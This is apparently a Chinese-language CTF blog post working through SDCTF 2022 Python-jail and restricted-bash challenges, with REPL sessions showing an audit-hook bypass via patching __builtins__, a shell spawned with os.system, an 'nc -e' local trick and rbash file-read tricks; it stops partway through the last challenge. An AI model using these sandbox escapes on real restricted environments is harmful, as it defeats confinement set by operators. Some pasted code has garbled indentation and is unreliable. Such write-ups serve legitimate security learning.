<!DOCTYPE html>
<html lang="zh-Hans">
<head>

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no" />
<meta name="author" content="nich0las" />



<meta name="description" content="第一次学习有关pyjail喝bashjail相关知识。题目参考是sdctf2022">
<meta property="og:type" content="article">
<meta property="og:title" content="pyjail">
<meta property="og:url" content="https://nicholas-wei.github.io/2022/05/08/pyjail/index.html">
<meta property="og:site_name" content="welc0me">
<meta property="og:description" content="第一次学习有关pyjail喝bashjail相关知识。题目参考是sdctf2022">
<meta property="og:locale">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/08/pyjail/Users/15302/AppData/Roaming/Typora/typora-user-images/image-20220509093446353.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/08/pyjail/Users/15302/AppData/Roaming/Typora/typora-user-images/image-20220509103919244.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/08/pyjail/Users/15302/AppData/Roaming/Typora/typora-user-images/image-20220509115906100.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/08/pyjail/Users/15302/AppData/Roaming/Typora/typora-user-images/image-20220509115633394.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/08/pyjail/Users/15302/AppData/Roaming/Typora/typora-user-images/image-20220509110336077.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/08/pyjail/Users/15302/AppData/Roaming/Typora/typora-user-images/image-20220509112445901.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/08/pyjail/Users/15302/AppData/Roaming/Typora/typora-user-images/image-20220509112522650.png">
<meta property="og:image" content="https://nicholas-wei.github.io/2022/05/08/pyjail/Users/15302/AppData/Roaming/Typora/typora-user-images/image-20220509112622269.png">
<meta property="article:published_time" content="2022-05-08T08:41:28.000Z">
<meta property="article:modified_time" content="2022-05-10T05:41:52.000Z">
<meta property="article:author" content="nich0las">
<meta property="article:tag" content="bash_jail">
<meta property="article:tag" content="pyjail">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://nicholas-wei.github.io/2022/05/08/pyjail/Users/15302/AppData/Roaming/Typora/typora-user-images/image-20220509093446353.png">

<link rel="apple-touch-icon" href= "/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="welc0me" type="application/atom+xml">



    <link rel="shortcut icon" href="/favicon.png">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">



<link rel="stylesheet" href="/css/style.css">




<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>pyjail | welc0me</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: true
    }
</script>


    <script>
        yiliaConfig.jquery_ui = [true, "//cdn.bootcss.com/jqueryui/1.10.4/jquery-ui.min.js", "//cdn.bootcss.com/jqueryui/1.10.4/css/jquery-ui.min.css"];
    </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






<meta name="generator" content="Hexo 5.4.2"></head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/avatar.png" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/"></a></h1>
        </hgroup>

        

        
            <form id="search-form">
            <input type="text" id="local-search-input" name="q" placeholder="search..." class="search form-control" autocomplete="off" autocorrect="off" searchonload="" />
            <i class="fa fa-times" onclick="resetSearch()"></i>
            </form>
            <div id="local-search-result"></div>
            <p class='no-result'>No results found <i class='fa fa-spinner fa-pulse'></i></p>
        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/DNS/" rel="tag">DNS</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/FSOP/" rel="tag">FSOP</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/IO-FILE/" rel="tag">IO_FILE</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/VM/" rel="tag">VM</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/angr/" rel="tag">angr</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/bash-jail/" rel="tag">bash_jail</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/botnet/" rel="tag">botnet</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/directed-fuzz/" rel="tag">directed_fuzz</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/dp/" rel="tag">dp</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/exit-hook/" rel="tag">exit_hook</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/fb-bot/" rel="tag">fb-bot</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/fmtstr/" rel="tag">fmtstr</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/fuzz/" rel="tag">fuzz</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/fuzzing101/" rel="tag">fuzzing101</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/graph/" rel="tag">graph</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/hardware/" rel="tag">hardware</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/heap/" rel="tag">heap</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ics-pa/" rel="tag">ics-pa</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/int-overflow/" rel="tag">int_overflow</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/interpreter/" rel="tag">interpreter</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/iot/" rel="tag">iot</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/kernel/" rel="tag">kernel</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/llvm/" rel="tag">llvm</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/matlab/" rel="tag">matlab</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/maze/" rel="tag">maze</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/meltdown/" rel="tag">meltdown</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pwnable-tw/" rel="tag">pwnable.tw</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pyjail/" rel="tag">pyjail</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/race-condition/" rel="tag">race_condition</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ransomeware/" rel="tag">ransomeware</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/shellcode/" rel="tag">shellcode</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/software-security/" rel="tag">software-security</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/stack/" rel="tag">stack</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/tcp/" rel="tag">tcp</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/tree/" rel="tag">tree</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/wasm/" rel="tag">wasm</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/wechat/" rel="tag">wechat</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/wp/" rel="tag">wp</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="https://hexo.io">Hexo</a>
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="https://pages.github.com/">GitHub</a>
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="http://moxfive.xyz/">MOxFIVE</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">勤能补拙是良训</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页"></a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/avatar.png" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页"></a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="标签" friends="友情链接" about="关于我"/>
</nav>
      <div class="body-wrap"><article id="post-pyjail" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2022/05/08/pyjail/" class="article-date">
      <time datetime="2022-05-08T08:41:28.000Z" itemprop="datePublished">2022-05-08</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      pyjail
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
    <div class="article-category tagcloud">
    <a class="article-category-link" href="/categories/misc/">misc</a>
    </div>


        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/bash-jail/" rel="tag">bash_jail</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pyjail/" rel="tag">pyjail</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p>第一次学习有关pyjail喝bashjail相关知识。题目参考是sdctf2022</p>
<span id="more"></span>

<h1 id="starter"><a href="#starter" class="headerlink" title="starter"></a>starter</h1><p>这里看了介绍视频学习。一般的pyjail题目就是给一个python的交互界面，然后源码会给你，但是源码后面一些禁掉的东西可能不会告诉你。然后要读flag。也是第一次学。</p>
<h2 id="chall1"><a href="#chall1" class="headerlink" title="chall1"></a>chall1</h2><p>可以看到repl中，事先已经给我们读入了一个flag1。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">repl</span>():</span><br><span class="line">    global_dict = <span class="built_in">dict</span>()</span><br><span class="line">    global_dict[<span class="string">&#x27;flag1&#x27;</span>] = flag1 <span class="comment"># 事先读入了一个</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            src = <span class="built_in">input</span>(PROMPT)</span><br><span class="line">        <span class="keyword">except</span> EOFError:</span><br><span class="line">            <span class="built_in">print</span>() <span class="comment"># print newline</span></span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">except</span> KeyboardInterrupt:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&#x27;canceled&#x27;</span>)</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        <span class="keyword">if</span> src == <span class="string">&#x27;&#x27;</span>: <span class="comment"># Skip empty lines</span></span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            code = <span class="built_in">compile</span>(src, <span class="string">&#x27;&lt;string&gt;&#x27;</span>, <span class="string">&#x27;single&#x27;</span>)</span><br><span class="line">        <span class="keyword">except</span> SyntaxError <span class="keyword">as</span> e:</span><br><span class="line">            <span class="built_in">print</span>(e)</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            <span class="built_in">exec</span>(code, global_dict)</span><br><span class="line">        <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">            <span class="built_in">print</span>(e)</span><br></pre></td></tr></table></figure>

<p>但是我们只允许执行白盒里面的参数。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">audit_hook</span>(<span class="params">event, _</span>):</span><br><span class="line">    <span class="comment"># These are the only necessary events for this Math REPL to work</span></span><br><span class="line">    ALLOWED_EVENTS = <span class="built_in">set</span>(&#123;<span class="string">&#x27;builtins.input&#x27;</span>, <span class="string">&#x27;builtins.input/result&#x27;</span>, <span class="string">&#x27;exec&#x27;</span>, <span class="string">&#x27;compile&#x27;</span>&#125;)</span><br><span class="line">    <span class="keyword">if</span> event <span class="keyword">not</span> <span class="keyword">in</span> ALLOWED_EVENTS:</span><br><span class="line">        <span class="comment"># Thou shalt not hack!</span></span><br><span class="line">        <span class="keyword">raise</span> RuntimeError(<span class="string">&#x27;Operation not permitted: &#123;&#125;&#x27;</span>.<span class="built_in">format</span>(event))</span><br></pre></td></tr></table></figure>

<p>注意,audit_hook是python3.8中的一种自定义钩子函数。相当于一个sandbox。</p>
<p>使用如下命令添加了一个<code>audit hook</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sys.addaudithook(audit_hook)</span><br></pre></td></tr></table></figure>

<p>我们的flag1，应该和这个函数关系密切，但是我们无法阅读到源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 注意这里的proprietary并未给用户</span></span><br><span class="line">flag1 = proprietary.get_flag1()</span><br></pre></td></tr></table></figure>

<p>那么我们一开始应该是想知道这个类有什么特性。使用以下代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="built_in">dir</span>()</span><br><span class="line">[<span class="string">&#x27;__builtins__&#x27;</span>, <span class="string">&#x27;flag1&#x27;</span>]</span><br></pre></td></tr></table></figure>

<p>查看到当前运行空间中的所有类名称。</p>
<p>同样的，我们想看看flag1有什么内容，使用以下命令。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="built_in">dir</span>(flag1)</span><br><span class="line">[<span class="string">&#x27;-flag1-&#x27;</span>, <span class="string">&#x27;__class__&#x27;</span>, <span class="string">&#x27;__delattr__&#x27;</span>, <span class="string">&#x27;__dict__&#x27;</span>, <span class="string">&#x27;__dir__&#x27;</span>, <span class="string">&#x27;__doc__&#x27;</span>, <span class="string">&#x27;__eq__&#x27;</span>, <span class="string">&#x27;__format__&#x27;</span>, <span class="string">&#x27;__ge__&#x27;</span>, <span class="string">&#x27;__getattribute__&#x27;</span>, <span class="string">&#x27;__gt__&#x27;</span>, <span class="string">&#x27;__hash__&#x27;</span>, <span class="string">&#x27;__init__&#x27;</span>, <span class="string">&#x27;__init_subclass__&#x27;</span>, <span class="string">&#x27;__le__&#x27;</span>, <span class="string">&#x27;__lt__&#x27;</span>, <span class="string">&#x27;__module__&#x27;</span>, <span class="string">&#x27;__ne__&#x27;</span>, <span class="string">&#x27;__new__&#x27;</span>, <span class="string">&#x27;__reduce__&#x27;</span>, <span class="string">&#x27;__reduce_ex__&#x27;</span>, <span class="string">&#x27;__repr__&#x27;</span>, <span class="string">&#x27;__setattr__&#x27;</span>, <span class="string">&#x27;__sizeof__&#x27;</span>, <span class="string">&#x27;__str__&#x27;</span>, <span class="string">&#x27;__subclasshook__&#x27;</span>, <span class="string">&#x27;__weakref__&#x27;</span>]</span><br></pre></td></tr></table></figure>

<p>注意到其中有一个<code>-flag1-</code>是很罕见的。能不能执行呢?结论是不行，因为这里的”-“导致参数错误</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span>flag1.-flag1-</span><br><span class="line">invalid syntax (&lt;string&gt;, line <span class="number">1</span>)</span><br></pre></td></tr></table></figure>

<p>那么有没有别的办法查看-flag1-的内容呢?<strong>这里使用了一个”getattr”的函数</strong>。我们来试试。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="built_in">getattr</span>(flag1,<span class="string">&quot;-flag1-&quot;</span>)   </span><br><span class="line">REDACTED</span><br></pre></td></tr></table></figure>

<p>这里输出了一个READCTED。表示这个输出被编辑过了。<strong>注意，这个编辑并不是python自带的，而是出题的人加上的。python本身并不会报这个错</strong>。</p>
<p>尝试输出一下flag1的其他属性。发现也被patch过，不可输出。<strong>但是，如果我们用list的方式，切片输出其内容，会发现可以成功输出。</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span>flag1.__dict__</span><br><span class="line">&#123;<span class="string">&#x27;-flag1-&#x27;</span>: REDACTED&#125;</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="built_in">getattr</span>(flag1,<span class="string">&quot;-flag1-&quot;</span>)[:]</span><br><span class="line"><span class="string">&#x27;flag&#123;flag1&#125;\n&#x27;</span></span><br></pre></td></tr></table></figure>

<h2 id="chall2"><a href="#chall2" class="headerlink" title="chall2"></a>chall2</h2><p>这一次中，我们没有flag1这个变量。只能自己想办法把flag2变成类似flag1的变量，或者用其他办法。</p>
<p>在这里，我们针对<code>addaudithook</code>这个属性进行攻击。下面的方法证明，<code>audithook</code>本身并不是安全的沙箱。</p>
<p>注意到，我们在dir中，还有另外一个属性可用。<code>__builtins__</code>。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="built_in">dir</span>()</span><br><span class="line">[<span class="string">&#x27;__builtins__&#x27;</span>, <span class="string">&#x27;flag1&#x27;</span>]</span><br></pre></td></tr></table></figure>

<p>修改<code>__builtins__</code>，可以修改默认的内置函数的行为。回看源码。我们在audithook中使用了<code>set</code>。因此似乎只要想办法把set patch了即可。这里也是学到了新的方法。由于audithoon应该是每次执行repr之前都会被调用来检查参数，因此这个set也会每次被调用。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span>__builtins__[<span class="string">&quot;set&quot;</span>] = <span class="keyword">lambda</span> x: &#123;<span class="string">&#x27;builtins.input&#x27;</span>, <span class="string">&#x27;builtins.input/result&#x27;</span>, <span class="string">&#x27;exec&#x27;</span>, <span class="string">&#x27;compile&#x27;</span>, <span class="string">&#x27;os.system&#x27;</span>&#125;</span><br></pre></td></tr></table></figure>

<p>使用上面的语句，x表示输入参数，后面为返回值。这句话表示当我们调用set时，无论输入什么参数，返回的都是上面的内容。事实上，我们修改为上面内容加上一个os.system()</p>
<p>之后就可以愉快的拿flag了。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="keyword">import</span> os</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>os.system(<span class="string">&quot;sh&quot;</span>)</span><br><span class="line">$ ls</span><br><span class="line">flag1.txt  flag2.txt  jail.py  properi  proprietary.py  __pycache__  test  test.c</span><br></pre></td></tr></table></figure>

<h1 id="Rbash-Warmup"><a href="#Rbash-Warmup" class="headerlink" title="Rbash Warmup"></a>Rbash Warmup</h1><p>这里一进去发现能用的命令不多</p>
<p><img src="/2022/05/08/pyjail/Users\15302\AppData\Roaming\Typora\typora-user-images\image-20220509093446353.png" alt="image-20220509093446353"></p>
<p>但是有nc可以用。这里学到一个方法。使用反向shell，并且是用-e的flag来执行文件。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">rbash-5.0$ nc -lvp 1234 &amp;</span><br><span class="line">[1] 3</span><br><span class="line">rbash-5.0$ listening on [any] 1234 ...</span><br><span class="line">nc 127.0.0.1 1234 -e /flag</span><br><span class="line">127.0.0.1: inverse host lookup failed: Host name lookup failure</span><br><span class="line">connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 38918</span><br><span class="line">sdctf&#123;nc--e-IS-r3aLLy-D4NG3R0U5!&#125;</span><br></pre></td></tr></table></figure>

<h1 id="Rbash-Yet-Another-Calculator"><a href="#Rbash-Yet-Another-Calculator" class="headerlink" title="Rbash Yet Another Calculator"></a>Rbash Yet Another Calculator</h1><p>可以看到nc没有了。</p>
<p><img src="/2022/05/08/pyjail/Users\15302\AppData\Roaming\Typora\typora-user-images\image-20220509103919244.png" alt="image-20220509103919244"></p>
<p>这里看到没有nc了，环境还是上一个rbash。但是没有ls，不知道flag的名称。</p>
<p>解法有以下几种</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">rbash-5.0$ echo *</span><br><span class="line">flag-xEpAN7X3tGYjt4Y0p0FD.txt jail.sh</span><br><span class="line">rbash-5.0$ source flag-xEpAN7X3tGYjt4Y0p0FD.txt</span><br><span class="line">rbash: sdctf&#123;red1r3ct1ng_std1n_IS_p3rm1tt3d_1n_rb45h!&#125;: command not found</span><br><span class="line">rbash-5.0$ echo `&lt; flag-xEpAN7X3tGYjt4Y0p0FD.txt`</span><br><span class="line">sdctf&#123;red1r3ct1ng_std1n_IS_p3rm1tt3d_1n_rb45h!&#125;</span><br><span class="line">rbash-5.0$ read &lt; flag-xEpAN7X3tGYjt4Y0p0FD.txt;echo $REPLY</span><br><span class="line">sdctf&#123;red1r3ct1ng_std1n_IS_p3rm1tt3d_1n_rb45h!&#125;</span><br><span class="line">rbash-5.0$ echo &quot;$(&lt;flag-xEpAN7X3tGYjt4Y0p0FD.txt)&quot;</span><br><span class="line">sdctf&#123;red1r3ct1ng_std1n_IS_p3rm1tt3d_1n_rb45h!&#125;</span><br></pre></td></tr></table></figure>

<h1 id="Rbash-Negotiation-with-the-warden"><a href="#Rbash-Negotiation-with-the-warden" class="headerlink" title="Rbash Negotiation with the warden"></a>Rbash Negotiation with the warden</h1><p>这里限制了我们能访问的路径。我们只能添加特定的路径，在特定的路径下创建文件。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">elif</span> opt == <span class="number">5</span>: <span class="comment"># Add a permitted PATH</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;Want more paths to escape? But sorry you are only allowed to take some of our prespecified paths below:&quot;</span>)</span><br><span class="line">    print_paths(WHITELIST_PATHS)</span><br><span class="line">    pathnumstr = <span class="built_in">input</span>(<span class="string">&#x27;Select which paths to add (1-&#123;&#125;)&gt; &#x27;</span>.<span class="built_in">format</span>(<span class="built_in">len</span>(WHITELIST_PATHS)))</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        pathnum = <span class="built_in">int</span>(pathnumstr)</span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span> <span class="number">1</span> &lt;= pathnum &lt;= <span class="built_in">len</span>(WHITELIST_PATHS):</span><br><span class="line">            <span class="keyword">raise</span> ValueError</span><br><span class="line">            <span class="keyword">except</span> ValueError:</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">&#x27;Invalid index: &#123;&#125;&#x27;</span>.<span class="built_in">format</span>(pathnumstr))</span><br><span class="line">                <span class="keyword">continue</span></span><br></pre></td></tr></table></figure>

<p>而且外边并没有<code>nc</code></p>
<p><img src="/2022/05/08/pyjail/Users\15302\AppData\Roaming\Typora\typora-user-images\image-20220509115906100.png" alt="image-20220509115906100"></p>
<p>这题有一个很神奇的地方，就是当你删除PATH，把path删除完了之后</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">elif</span> opt == <span class="number">6</span>: <span class="comment"># Deprive myself of a permitted PATH</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;Weird. I have never seen a prisoner who wants to voluntarily give up their own rights. But whatever.&quot;</span>)</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> PATH_LIST:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&#x27;You have no paths! Try adding one.&#x27;</span>)</span><br><span class="line">        <span class="keyword">continue</span></span><br><span class="line">        print_paths(PATH_LIST)</span><br><span class="line">        pathnumstr = <span class="built_in">input</span>(<span class="string">&#x27;Select which path to remove (1-&#123;&#125;)&gt; &#x27;</span>.<span class="built_in">format</span>(<span class="built_in">len</span>(PATH_LIST)))</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            pathnum = <span class="built_in">int</span>(pathnumstr)</span><br><span class="line">            <span class="keyword">if</span> <span class="keyword">not</span> <span class="number">1</span> &lt;= pathnum &lt;= <span class="built_in">len</span>(PATH_LIST):</span><br><span class="line">                <span class="keyword">raise</span> ValueError</span><br><span class="line">                <span class="keyword">except</span> ValueError:</span><br><span class="line">                    <span class="built_in">print</span>(<span class="string">&#x27;Invalid index: &#123;&#125;&#x27;</span>.<span class="built_in">format</span>(pathnumstr))</span><br><span class="line">                    <span class="keyword">continue</span></span><br><span class="line">                    <span class="keyword">del</span> PATH_LIST[pathnum - <span class="number">1</span>]</span><br></pre></td></tr></table></figure>

